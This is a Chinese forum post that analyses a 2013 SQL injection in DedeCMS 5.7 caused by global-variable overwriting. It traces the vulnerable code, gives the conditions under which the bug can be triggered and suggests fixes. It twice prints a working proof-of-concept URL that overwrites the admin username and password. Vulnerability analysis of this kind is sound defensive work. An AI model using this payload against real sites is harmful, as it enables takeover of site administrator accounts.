维护三方 發表於 2013-6-11 15:28:01

Dedecms最新注入漏洞分析及修复方法

<p>最近看到网上曝出的dedecms最新版本的一个注入漏洞利用,漏洞PoC和分析文章也已在网上公开.但是在我实际测试过程当中,发现无法复现。原因是此漏洞的利用需要一定的前提条件,而原分析文章当中并没有交代这些,所以这里将我的分析过程以及一些触发的必要条件总结了一下。</p>
<p><strong>一. 漏洞跟踪</strong></p>
<p>发布时间:2013年6月7日</p>
<p><strong>漏洞描述:</strong></p>
<p>DedeCMS是一个网站应用系统构建平台,也是一个强大的网站内容管理系统。基于PHP+MySQL的技术架构,完全开源加上强大稳定的技术架构,既可以用来构建复杂体系的企业信息门户或电子商务网站平台,也可以用来管理简单内容发布网站,不管是商务资源门户还是娱乐信息门户,它都是您管理网站的好帮手。</p>
<p>漏洞触发的根源在于dedesql.class.php在调用$GLOBALS[&lsquo;arrs1&rsquo;]、$GLOBALS[&lsquo;arrs1&rsquo;]这两个全局变量之前未对其进行初始化,导致能够覆盖任意全局变量。</p>
<p><strong>漏洞危害:</strong>因为dedecms的使用非常广泛,而此漏洞利用方便,危害性高,能够远程获取管理后台,进而直接getshell获取系统控制权。</p>
<p><strong>触发条件:</strong>确保php.ini中使用php_mysql.dll同时未开启php_mysqli.dll,</p>
<p><strong>如图所示:</strong></p>
<p><img title="clip_image002" height="217" alt="clip_image002" width="627" border="0" src="https://img.jbzj.com/file_images/article/201306/2013061115302617.jpg" /></p>
<p><strong>受影响版本:</strong>dedecms 5.7</p>
<p><strong>二. 漏洞原理</strong></p>
<p>首先说一下dedecms不安全的参数处理机制,这里我们看一下/include/common.inc.php代码的第79行:</p>
<p>foreach(Array(&lsquo;_GET&rsquo;,'_POST&rsquo;,'_COOKIE&rsquo;) as $_request)</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; foreach($$_request as $_k =&gt; $_v) </p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if($_k == &lsquo;nvarname&rsquo;) ${$_k} = $_v;</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; else <strong>${$_k} = _RunMagicQuotes($_v);</strong></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</p>
<p>万恶之源其实就在这里,基本上目前dede被发现的漏洞全都死在这里。我们可以看到,程序从GPC数组中取出名值对后,只是对$_v做了简单的addslashes处理,就直接赋给了${$_k},实现了类似全局变量覆盖的机制,设计的初衷是为了开发方便,但却存在着严重的安全问题。PHP在经历了这么多年的更新换代终于修补了register_globals问题,但是dede的这段代码使php付出的努力全部白费。</p>
<p><strong>下面我们回归漏洞。</strong></p>
<p>首先是/include/dedesql.class.php的第589-600行,<strong></strong></p>
<p><img title="clip_image004" height="428" alt="clip_image004" width="596" border="0" src="https://img.jbzj.com/file_images/article/201306/2013061115302618.jpg" /></p>
<p>在执行这段代码之前,程序未初始化$arrs1和$arrs2这两个数组。结合前面提到的dede不安全的参数处理机制,利用这段代码我们可以覆盖任意全局变量。例如在这个漏洞中,我们可以控制$GLOBALS['cfg_dbprefix']的值。</p>
<p>然后,我们来看一下如何利用$GLOBALS['cfg_dbprefix']。</p>
<p>这里在/include/dedesql.class.php的第512行SetQuery函数中,代码如下</p>
<p><img title="clip_image006" height="173" alt="clip_image006" width="619" border="0" src="https://img.jbzj.com/file_images/article/201306/2013061115302619.jpg" /></p>
<p>这里因为$GLOBALS['cfg_dbprefix']是可控的,进而$prefix也是可控的,所以在这儿就造成了SQL注入。</p>
<p>下面跟踪一下整个漏洞的触发过程,这是网上已经公开的PoC:</p>
<p>http://localhost/dedecms5.7/plus/download.php?open=1&amp;arrs1[]=99&amp;arrs1[]=102&amp;arrs1[]=103&amp;arrs1[]=95&amp;arrs1[]=100&amp;arrs1[]=98&amp;arrs1[]=112&amp;arrs1[]=114&amp;arrs1[]=101&amp;arrs1[]=102&amp;arrs1[]=105&amp;arrs1[]=120&amp;arrs2[]=97&amp;arrs2[]=100&amp;arrs2[]=109&amp;arrs2[]=105&amp;arrs2[]=110&amp;arrs2[]=96&amp;arrs2[]=32&amp;arrs2[]=83&amp;arrs2[]=69&amp;arrs2[]=84&amp;arrs2[]=32&amp;arrs2[]=96&amp;arrs2[]=117&amp;arrs2[]=115&amp;arrs2[]=101&amp;arrs2[]=114&amp;arrs2[]=105&amp;arrs2[]=100&amp;arrs2[]=96&amp;arrs2[]=61&amp;arrs2[]=39&amp;arrs2[]=116&amp;arrs2[]=101&amp;arrs2[]=115&amp;arrs2[]=116&amp;arrs2[]=39&amp;arrs2[]=44&amp;arrs2[]=32&amp;arrs2[]=96&amp;arrs2[]=112&amp;arrs2[]=119&amp;arrs2[]=100&amp;arrs2[]=96&amp;arrs2[]=61&amp;arrs2[]=39&amp;arrs2[]=102&amp;arrs2[]=50&amp;arrs2[]=57&amp;arrs2[]=55&amp;arrs2[]=97&amp;arrs2[]=53&amp;arrs2[]=55&amp;arrs2[]=97&amp;arrs2[]=53&amp;arrs2[]=97&amp;arrs2[]=55&amp;arrs2[]=52&amp;arrs2[]=51&amp;arrs2[]=56&amp;arrs2[]=57&amp;arrs2[]=52&amp;arrs2[]=97&amp;arrs2[]=48&amp;arrs2[]=101&amp;arrs2[]=52&amp;arrs2[]=39&amp;arrs2[]=32&amp;arrs2[]=119&amp;arrs2[]=104&amp;arrs2[]=101&amp;arrs2[]=114&amp;arrs2[]=101&amp;arrs2[]=32&amp;arrs2[]=105&amp;arrs2[]=100&amp;arrs2[]=61&amp;arrs2[]=49&amp;arrs2[]=32&amp;arrs2[]=35</p>
<p>首先看这个if判断,意思是如果开启了mysqli扩展,则包含dedesqli.class.php。这里存在漏洞的代码在dedesql.class.php中,所以漏洞利用的前提条件是必须关闭mysqli扩展。</p>
<p><img title="clip_image008" height="319" alt="clip_image008" width="624" border="0" src="https://img.jbzj.com/file_images/article/201306/2013061115302620.jpg" /></p>
<p>这里跟入dedesql.class.php代码,如图</p>
<p><img title="clip_image010" height="417" alt="clip_image010" width="619" border="0" src="https://img.jbzj.com/file_images/article/201306/2013061115302621.jpg" /></p>
<p>这里我们传入的arrs1、arrs2两个数组因为还没有被初始化,所以这里$v1、$v2拼接为字符串,如图所示</p>
<p><img title="clip_image012" height="194" alt="clip_image012" width="628" border="0" src="https://img.jbzj.com/file_images/article/201306/2013061115302622.jpg" /></p>
<p>所以执行到这里$GLOBALS['cfg_dbprefix']被覆盖为</p>
<p>admin` SET `userid`=&rsquo;test&rsquo;, `pwd`=&rsquo;f297a57a5a743894a0e4&prime; where id=1 #</p>
<p>继续跟踪代码执行,</p>
<p><img title="clip_image014" height="309" alt="clip_image014" width="614" border="0" src="https://img.jbzj.com/file_images/article/201306/2013061115302623.jpg" /></p>
<p>跟入ExecuteNoneQuery2函数,一直跟进SetQuery,如图</p>
<p><img title="clip_image016" height="198" alt="clip_image016" width="620" border="0" src="https://img.jbzj.com/file_images/article/201306/2013061115302624.jpg" /></p>
<p>这里因为$GLOBALS['cfg_dbprefix']是我们可控的,所以就造成了注入,这里看一下$sql的值,如图所示</p>
<p><img title="clip_image018" height="200" alt="clip_image018" width="631" border="0" src="https://img.jbzj.com/file_images/article/201306/2013061115302625.jpg" /></p>
<p>因为ExecuteNoneQuery2函数没有使用mysql-ids进行过滤,所以这里借助它来注入。执行update成功之后,后台账户为test,密码为admin。</p>
<p><strong>三. 漏洞验证</strong></p>
<p><strong>PoC:</strong></p>
<p>http://localhost/dedecms5.7/plus/download.php?open=1&amp;arrs1[]=99&amp;arrs1[]=102&amp;arrs1[]=103&amp;arrs1[]=95&amp;arrs1[]=100&amp;arrs1[]=98&amp;arrs1[]=112&amp;arrs1[]=114&amp;arrs1[]=101&amp;arrs1[]=102&amp;arrs1[]=105&amp;arrs1[]=120&amp;arrs2[]=97&amp;arrs2[]=100&amp;arrs2[]=109&amp;arrs2[]=105&amp;arrs2[]=110&amp;arrs2[]=96&amp;arrs2[]=32&amp;arrs2[]=83&amp;arrs2[]=69&amp;arrs2[]=84&amp;arrs2[]=32&amp;arrs2[]=96&amp;arrs2[]=117&amp;arrs2[]=115&amp;arrs2[]=101&amp;arrs2[]=114&amp;arrs2[]=105&amp;arrs2[]=100&amp;arrs2[]=96&amp;arrs2[]=61&amp;arrs2[]=39&amp;arrs2[]=116&amp;arrs2[]=101&amp;arrs2[]=115&amp;arrs2[]=116&amp;arrs2[]=39&amp;arrs2[]=44&amp;arrs2[]=32&amp;arrs2[]=96&amp;arrs2[]=112&amp;arrs2[]=119&amp;arrs2[]=100&amp;arrs2[]=96&amp;arrs2[]=61&amp;arrs2[]=39&amp;arrs2[]=102&amp;arrs2[]=50&amp;arrs2[]=57&amp;arrs2[]=55&amp;arrs2[]=97&amp;arrs2[]=53&amp;arrs2[]=55&amp;arrs2[]=97&amp;arrs2[]=53&amp;arrs2[]=97&amp;arrs2[]=55&amp;arrs2[]=52&amp;arrs2[]=51&amp;arrs2[]=56&amp;arrs2[]=57&amp;arrs2[]=52&amp;arrs2[]=97&amp;arrs2[]=48&amp;arrs2[]=101&amp;arrs2[]=52&amp;arrs2[]=39&amp;arrs2[]=32&amp;arrs2[]=119&amp;arrs2[]=104&amp;arrs2[]=101&amp;arrs2[]=114&amp;arrs2[]=101&amp;arrs2[]=32&amp;arrs2[]=105&amp;arrs2[]=100&amp;arrs2[]=61&amp;arrs2[]=49&amp;arrs2[]=32&amp;arrs2[]=35</p>
<p><strong>验证截图:</strong></p>
<p><img title="clip_image020" height="415" alt="clip_image020" width="620" border="0" src="https://img.jbzj.com/file_images/article/201306/2013061115302626.jpg" /></p>
<p><strong>四. 漏洞修复</strong></p>
<p>0&times;01、修改php.ini,确保开启php_mysqli.dll扩展。</p>
<p>0&times;02、修改/include/dedesql.class.php中的代码,如下所示</p>
<p><strong>require_once(DEDEINC.&rsquo;/common.func.php&rsquo;);</strong></p>
<p>//引入数据库类</p>
<p>if ($GLOBALS['cfg_mysql_type'] == &lsquo;mysqli&rsquo; &amp;&amp; function_exists(&ldquo;mysqli_init&rdquo;))</p>
<p>{</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; //echo $GLOBALS['cfg_mysql_type'];</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; //exit;</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; require_once(DEDEINC.&rsquo;/dedesqli.class.php&rsquo;);</p>
<p>} else {</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; require_once(DEDEINC.&rsquo;/dedesql.class.php&rsquo;);</p>
<p>}</p>
<p><strong>//require_once(DEDEINC.&rsquo;/common.func.php&rsquo;);</strong></p>
頁: [1]
查看完整版本: Dedecms最新注入漏洞分析及修复方法